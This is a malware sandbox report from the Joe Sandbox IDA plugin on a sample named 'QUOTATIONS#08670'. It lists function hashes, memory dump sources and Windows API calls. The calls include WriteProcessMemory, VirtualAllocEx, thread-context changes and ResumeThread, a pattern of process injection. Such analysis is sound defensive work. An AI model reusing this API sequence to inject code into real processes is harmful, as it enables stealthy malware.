                                                          • String ID: @$TJdq$Te_q
                                                          • API String ID: 0-4144917423
                                                          • Opcode ID: 88bad85a27b07389514503a7e6fa3fa9c56ef1f40ca6b5b14d2cc19ea40901bb
                                                          • Instruction ID: 74de547f5223c3bded492b628ebd12884edafaf8093824571b197c1f276d7972
                                                          • Opcode Fuzzy Hash: 88bad85a27b07389514503a7e6fa3fa9c56ef1f40ca6b5b14d2cc19ea40901bb
                                                          • Instruction Fuzzy Hash: 4D41669160E7D10FD707573898242597FB1AF8B118B2E41DBD186CF6E3DA698C0AC3A6

                                                          Control-flow Graph (legend: Executed / Not Executed): function 8f6d98-8f6dbf, calling 8f67f0, 8f6d98 (recursive), 8f70a0, 8f72f0, 8f79a8, 8f79b8, 8fa405, 8f97c0 and 8f97d0; the rendered graph image is not reproduced here.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hcq$Hcq
                                                          • API String ID: 0-4088181183
                                                          • Opcode ID: c6da09cfe1390dbf460d55adcedfcfb198127a390fa320de78a840e104dbeeb4
                                                          • Instruction ID: b9e4c710dcadf61b0035c2645272a388d6f30a5791e3db58fc567faf85c91a2c
                                                          • Opcode Fuzzy Hash: c6da09cfe1390dbf460d55adcedfcfb198127a390fa320de78a840e104dbeeb4
                                                          • Instruction Fuzzy Hash: A5A1BB317002199FDB14AF78D858B7E7BA6FB88300F248529E606CB394EF719D55CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,cq$,cq
                                                          • API String ID: 0-2927840315
                                                          • Opcode ID: 336337fdf70e6e07539fb755795167e225323acb273e57114e9ad9731b1a5b6e
                                                          • Instruction ID: 22a29f66ecfa80921c80ae893aeeee212019b752e5ccf0c95850f6077b13fd9c
                                                          • Opcode Fuzzy Hash: 336337fdf70e6e07539fb755795167e225323acb273e57114e9ad9731b1a5b6e
                                                          • Instruction Fuzzy Hash: 4181BC30A0890A8FEB14CF7CC8849BAB7B2FF99305B258169D605DB360D735EC41CB61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (cq$(cq
                                                          • API String ID: 0-4121650363
                                                          • Opcode ID: 32991671bbac5b38365425746ca0248a441fc061524a38b1cd5973d77bd7dcec
                                                          • Instruction ID: 71e61f24ebe4b81b505c5e96b481487e99f853c0ec69c52974474e56219b2b21
                                                          • Opcode Fuzzy Hash: 32991671bbac5b38365425746ca0248a441fc061524a38b1cd5973d77bd7dcec
                                                          • Instruction Fuzzy Hash: 5861DF31E006198FCB04DBB8D8546AEBBF2FF98311F24856AD615EB391DB349D05CBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJdq$Te_q
                                                          • API String ID: 0-3934155944
                                                          • Opcode ID: 923a8689600a7c01c98a63b32c922e70a039e4172278fc3abfa21715affdfb59
                                                          • Instruction ID: fc63d47978ec38ef59b9dddefb6e12882d422f49c839e7fc476df95b47e25d7c
                                                          • Opcode Fuzzy Hash: 923a8689600a7c01c98a63b32c922e70a039e4172278fc3abfa21715affdfb59
                                                          • Instruction Fuzzy Hash: D0F096317004241FC708A77DA46893E77DBAFC9A247154159F50ACB3A1DE61DD068396
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te_q
                                                          • API String ID: 0-823545363
                                                          • Opcode ID: 254bb161524962317ecdd78f1f87dc7e5e5e78787de7ee2286a280fadb6de61f
                                                          • Instruction ID: 2e3b59d2493b16c861a5bc440a554cd56764480f409341c14bc698031a2a6700
                                                          • Opcode Fuzzy Hash: 254bb161524962317ecdd78f1f87dc7e5e5e78787de7ee2286a280fadb6de61f
                                                          • Instruction Fuzzy Hash: 10127E70F102248BC704FFF8D89966DBBF6BB88604F908529D489E7394DF789856C752
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te_q
                                                          • API String ID: 0-823545363
                                                          • Opcode ID: 42c92ef82e6662b1f8603bb52618ae7a61d2a45406138fd3105a64698c603414
                                                          • Instruction ID: d4c81fe129d80936b13b78ae6d638898f020f6602a09061f98b702180640721c
                                                          • Opcode Fuzzy Hash: 42c92ef82e6662b1f8603bb52618ae7a61d2a45406138fd3105a64698c603414
                                                          • Instruction Fuzzy Hash: 15126F70F102248BC704FFF8D89965DBBF6BB88604F908529D489E7394DF789856C752
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 057E23B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021137716.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_57e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 1708fdeb0658b8ea6c5dde89c52af2db7302435264590c450871d0a168fd2cc9
                                                          • Instruction ID: 6da3c46aab81f6e156a20eba020c3af9d43daeaf7226e1b7d1e94c28d4453048
                                                          • Opcode Fuzzy Hash: 1708fdeb0658b8ea6c5dde89c52af2db7302435264590c450871d0a168fd2cc9
                                                          • Instruction Fuzzy Hash: F23129B9A003058FDB04CF59C448AAABBF6FF8C314F25C499D519AB321D774A845DFA0
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0792C348
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 59f82f93e2f80062d4dd07e6ebb30dafe889cab0e4cd384650d965f37133fecd
                                                          • Instruction ID: b796c12773f83759e6fc4c06a1ef2b91acea0386f82f1ede555a012742f4b8c7
                                                          • Opcode Fuzzy Hash: 59f82f93e2f80062d4dd07e6ebb30dafe889cab0e4cd384650d965f37133fecd
                                                          • Instruction Fuzzy Hash: 842157B19003599FCB10DFA9C881BDEBBF5FF48310F10882AE919A7240C7789945DBA0
                                                          APIs
                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0792B90E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: dd7e93dbf90d38268ae848b3149e6e2150b0ae614f32c73b859e6caeab9bb964
                                                          • Instruction ID: 523544c947106234fe3e719fd6c2f56e73de8bd3aaa2637841138369a0b3e235
                                                          • Opcode Fuzzy Hash: dd7e93dbf90d38268ae848b3149e6e2150b0ae614f32c73b859e6caeab9bb964
                                                          • Instruction Fuzzy Hash: 792135B1D003199FDB14DFAAC4857EEBBF4EF48324F14842AD459A7240DB78A945CFA1
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0792CD26
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 92593c4a8f47a858f43b3a633b562f9f5228fd6f39534bf64dbe91a3034592a3
                                                          • Instruction ID: c58386fd91e0347b8a172ed0ba7dd756342b540244c9a07d93e840ca16e1f10d
                                                          • Opcode Fuzzy Hash: 92593c4a8f47a858f43b3a633b562f9f5228fd6f39534bf64dbe91a3034592a3
                                                          • Instruction Fuzzy Hash: 9C2134B1D002199FDB10DFAAC4857EEBBF4AF89324F10842AD459A7241C778A945CFA1
                                                          APIs
                                                          • VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 0792CA7F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b3e168c12a0b0e988f7e4abf8014c4d88b70ac7bc1ed29d0dc501d428a3d6ff4
                                                          • Instruction ID: 755b6e82556eb6d99fd8ce02f139e5d18e098b34993c3f4c9acc9b044a57a7bb
                                                          • Opcode Fuzzy Hash: b3e168c12a0b0e988f7e4abf8014c4d88b70ac7bc1ed29d0dc501d428a3d6ff4
                                                          • Instruction Fuzzy Hash: E02147B1C003099FCB10DFAAC885AEEFBF4EF48320F10842AD519A7250C7799945DFA1
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0792272B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 50594d694eb63bd0074b83d87a088c689b0a88ad8042119c3392e54b34e31bcb
                                                          • Instruction ID: 06256093f274072700fa3d10f722e69594b3b9bf67df8b21b74c87e28011b628
                                                          • Opcode Fuzzy Hash: 50594d694eb63bd0074b83d87a088c689b0a88ad8042119c3392e54b34e31bcb
                                                          • Instruction Fuzzy Hash: 672133B59002499FCB10DF9AD484ADEFBF4FB48320F10842AE869A7251D339A945CFA1
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000), ref: 0712AD40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024406151.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7120000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: ed104cf79a694208d3d194b951a295a3161440bf1a366d7f4d568d0cb7227c19
                                                          • Instruction ID: 45f4f7494e810793c2ac95c9b6ea27a05b8991f2b6222a4760e49ff243c076b9
                                                          • Opcode Fuzzy Hash: ed104cf79a694208d3d194b951a295a3161440bf1a366d7f4d568d0cb7227c19
                                                          • Instruction Fuzzy Hash: 102144B1C0062A9BCB10CF9AD4447DEFBB4AF08320F10812AD818B7240D338A944CFA5
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000), ref: 0712AD40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024406151.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7120000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 1c4f3eccb2d8cd946645d3ae9753bdfab9e8a9a2ae3c84f8d55e9066be5cc7ad
                                                          • Instruction ID: 19eec8ba5643f1c1f420805e632ed8a84b98eb155729d98bfd101f35f2a6f0c0
                                                          • Opcode Fuzzy Hash: 1c4f3eccb2d8cd946645d3ae9753bdfab9e8a9a2ae3c84f8d55e9066be5cc7ad
                                                          • Instruction Fuzzy Hash: 981122B1C0066A9BCB14CF9AD544B9EFBB4AF48320F15812AD858B7240D338A945CFA5
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0792272B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 59f4512e691f3951ba82107520b02dea916e5b85cba2231b298e44004fca6cb0
                                                          • Instruction ID: 9920ee10061321970d23bb8c54c9b917490e90a8608cdaa3711f558875c9b689
                                                          • Opcode Fuzzy Hash: 59f4512e691f3951ba82107520b02dea916e5b85cba2231b298e44004fca6cb0
                                                          • Instruction Fuzzy Hash: 952114B59002499FCB10DF9AC484BDEFBF8FB48320F10842AE958A3250D378A944CFA1
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0792BFE6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: fe70b0bbcf64aaa67082b0ebff383f645bc4ea8cfd6da14868fc7f76988e6341
                                                          • Instruction ID: eef356b71553d2f3999ffeba6a64aac39c147ad3cc6f0a8492a6309d3f31dfa1
                                                          • Opcode Fuzzy Hash: fe70b0bbcf64aaa67082b0ebff383f645bc4ea8cfd6da14868fc7f76988e6341
                                                          • Instruction Fuzzy Hash: 691137B19002599FCB10EFAAC845ADEFFF5EF48324F108419E519A7250C775A945CFA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 5261aea5eed8f028e313b081195eda9ee2c42cb6d98caef0015356b63b7a5d40
                                                          • Instruction ID: a78bfa64a30d0848eefb798a44078ea47d2c4eefe42413c1f03b396548322e67
                                                          • Opcode Fuzzy Hash: 5261aea5eed8f028e313b081195eda9ee2c42cb6d98caef0015356b63b7a5d40
                                                          • Instruction Fuzzy Hash: 7C1125B1D002598BCB24DFAAC4457DEFBF8AB89324F20841AD419A7250C779A945CBA5
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0792D72D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: cd3a380f2aa367ca7ee6e8dffc62c6370d727d46bc5709c965da03747ef3f46e
                                                          • Instruction ID: 8763ff7aaef36f4ef06a6bf5cdc50f3b10c2a5b62757841f406e9b95a52ee7e4
                                                          • Opcode Fuzzy Hash: cd3a380f2aa367ca7ee6e8dffc62c6370d727d46bc5709c965da03747ef3f46e
                                                          • Instruction Fuzzy Hash: 521122B59007599FCB10EF9AD488BDEFBF8EB48310F208419E558A7200D378A944CFA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'_q
                                                          • API String ID: 0-2033115326
                                                          • Opcode ID: c3347b25a28158541125caccdb35179c513fd0597efc677e9ee6f6d5ccf60b4b
                                                          • Instruction ID: 7e61fe52dd595521279175ae5f941d3dfbcebc5440cf97818a109d7d0a62283f
                                                          • Opcode Fuzzy Hash: c3347b25a28158541125caccdb35179c513fd0597efc677e9ee6f6d5ccf60b4b
                                                          • Instruction Fuzzy Hash: B24135746002099FCB158F69D998BBE7BB5FB88314F1000A9E696CB3B2CB30DD41CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'_q
                                                          • API String ID: 0-2033115326
                                                          • Opcode ID: 63b210fc947a305203ae7ed292ce1bb12b9847dd43bdf75ae1e1b327242c0b93
                                                          • Instruction ID: 0999e8cdd5c43019d7f72581836c4f0e4c4e013fb4daffe5aaf7f2d7238679da
                                                          • Opcode Fuzzy Hash: 63b210fc947a305203ae7ed292ce1bb12b9847dd43bdf75ae1e1b327242c0b93
                                                          • Instruction Fuzzy Hash: C821A17170425D9BCB14CF36D890BBB7BEAFBA6714B154426EA96C7258DB3ACC00C760
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (cq
                                                          • API String ID: 0-301743287
                                                          • Opcode ID: 6ee5745d1322dd061b065ec7f05a855e04c6c3b7f171277a790d032382da83fd
                                                          • Instruction ID: 14f0c460b10c63b7ea6fb828f087c9612b0c328ed43d57650ecdaa661504a2e5
                                                          • Opcode Fuzzy Hash: 6ee5745d1322dd061b065ec7f05a855e04c6c3b7f171277a790d032382da83fd
                                                          • Instruction Fuzzy Hash: 2601DE316097449FC7259F69AC1001EBFB6EF8232132446AFD549C7292CE20AE08C3A2
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: d53d2647494b3ec544fbf04abe97365148e941311f66daa955371ba77f4d8f29
                                                          • Instruction ID: 53f080790c40596137816efa4a7ec7e64dea1c71141ffff38a07f119943c992d
                                                          • Opcode Fuzzy Hash: d53d2647494b3ec544fbf04abe97365148e941311f66daa955371ba77f4d8f29
                                                          • Instruction Fuzzy Hash: 2B1133B58003499FCB20DF9AC445BDEBBF4EB48320F10841AD559A7240D338A945CFA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1d4958dec4e2b40ac7465bb0c5819133a613c3040e6efd7a90ccc9e1d21830f
                                                          • Instruction ID: 56afc02870dcc0f6b62dc4df77024ed45d061b775950e047b29dc1aacddf230c
                                                          • Opcode Fuzzy Hash: e1d4958dec4e2b40ac7465bb0c5819133a613c3040e6efd7a90ccc9e1d21830f
                                                          • Instruction Fuzzy Hash: 3AC1C070B142118FD304FFB8D49922D7BF6AF88614F81896DE4C9D73A4DE38984AC762
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b1975c04e89bfb8c0830f2553fb069ac79735e067c71b82a0a9ade2249839f8
                                                          • Instruction ID: d7e0906e8947d6017a0d1888faf3ecc5cb6b3adb8586f703c62dd1e9ca7d82d3
                                                          • Opcode Fuzzy Hash: 5b1975c04e89bfb8c0830f2553fb069ac79735e067c71b82a0a9ade2249839f8
                                                          • Instruction Fuzzy Hash: AD228F75E14214CFCB04FFB8E85826DBBB2AB49300F4185AAD489E73A4DF345D85CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ca1a4fbceb416028e9e3fd2693bbdbebb5473891c457e02d2d097786b559c5a
                                                          • Instruction ID: 14e467823cacb8456050ddc3f24074ef3d61a1cb5a1afd979379edf3921bfad0
                                                          • Opcode Fuzzy Hash: 4ca1a4fbceb416028e9e3fd2693bbdbebb5473891c457e02d2d097786b559c5a
                                                          • Instruction Fuzzy Hash: 30E1F470B183108FC305BB78D85922D7BF6BF85214F81C96AD4C9D73A5DA389C46C762
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9f687a65ec797728682b02c101c6283c1e70c0a280ab6bfe7ad0024a281e0316
                                                          • Instruction ID: 9a8186397808be814fa8deb273f85a6daec446079acc41f9192f30e1eff1520b
                                                          • Opcode Fuzzy Hash: 9f687a65ec797728682b02c101c6283c1e70c0a280ab6bfe7ad0024a281e0316
                                                          • Instruction Fuzzy Hash: 6FE1B571B14221CBC704FFB8E49963D7BB6BF88244F818969D489E7394DE389C46C792
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9bcaf397712abab095515adbff9e27c4e53b5698a7ff09c341b19ceef88112fb
                                                          • Instruction ID: e7036a13b1c8cf82f4cb6417a864c08d82659e8551a6bf8c23e001b28b538db6
                                                          • Opcode Fuzzy Hash: 9bcaf397712abab095515adbff9e27c4e53b5698a7ff09c341b19ceef88112fb
                                                          • Instruction Fuzzy Hash: F3C17271A14225DBD704BFB8EC98A3E77BAFB88604F418929D488D3354DF34581AC7A7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b8ab61ff2df18f04337c997e89f593f454e52ae18bdffed64ab148f932db5bb
                                                          • Instruction ID: b54f0e54ac0ed2c5d16b89aaf53d2339d9693664f6f8ee5611cfb2030ea64605
                                                          • Opcode Fuzzy Hash: 9b8ab61ff2df18f04337c997e89f593f454e52ae18bdffed64ab148f932db5bb
                                                          • Instruction Fuzzy Hash: 18B19570A10126DBD704FBB8D99862E77BAFB88604F518929D48DE3354DE385C06C7B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f9f75ee98282a7bea2454ed9fc1ed91fc42652ad8d1e49293e582cbb883e5f6
                                                          • Instruction ID: a78358c185fb2745de2a2e24dbc110f143938c9c72754a59807b9d14c98f1de8
                                                          • Opcode Fuzzy Hash: 1f9f75ee98282a7bea2454ed9fc1ed91fc42652ad8d1e49293e582cbb883e5f6
                                                          • Instruction Fuzzy Hash: B761D2303082099FEB149B78D854B3A7AA6FFD8314F24856AE606CB3A5DF74CC46C791
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79109fa14c92d48ff2b30d73dc9c65534fb1d59be90e09096b5fe8a4631430df
                                                          • Instruction ID: 488d641c6fc27886ba7fa427502dd91064b73256b54f18a3868e24195304825d
                                                          • Opcode Fuzzy Hash: 79109fa14c92d48ff2b30d73dc9c65534fb1d59be90e09096b5fe8a4631430df
                                                          • Instruction Fuzzy Hash: 8451BE317041098FCB15CF39D894A7A7BE9FF9971431644AAEA4ACB371EB21DC01CB60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b342c86ac4184e6566ad866dc2c52e6496f4871a2dc7628410287d4a35ecdc8d
                                                          • Instruction ID: 73f52f333c2caddbe7da851b09ae497ccfdeee78ef491caf445c8d5b779ddd89
                                                          • Opcode Fuzzy Hash: b342c86ac4184e6566ad866dc2c52e6496f4871a2dc7628410287d4a35ecdc8d
                                                          • Instruction Fuzzy Hash: 7AF082317442485FD308AB75AC6977A3FA5BF89651F1884F9F249CF2B6DE608C01C781
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54f377ec6c16003a123133dbd5fc34592c989bfb68bb8b932334ed057e00d0af
                                                          • Instruction ID: 9797165049a1bc42a6250dc8a739b73b7e3b922aefc55489bf920445adf6edfe
                                                          • Opcode Fuzzy Hash: 54f377ec6c16003a123133dbd5fc34592c989bfb68bb8b932334ed057e00d0af
                                                          • Instruction Fuzzy Hash: 00D01272089389CFC30367B0BE2C0B43FA2FD5726632D40E7E245C7636E9614816C716
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
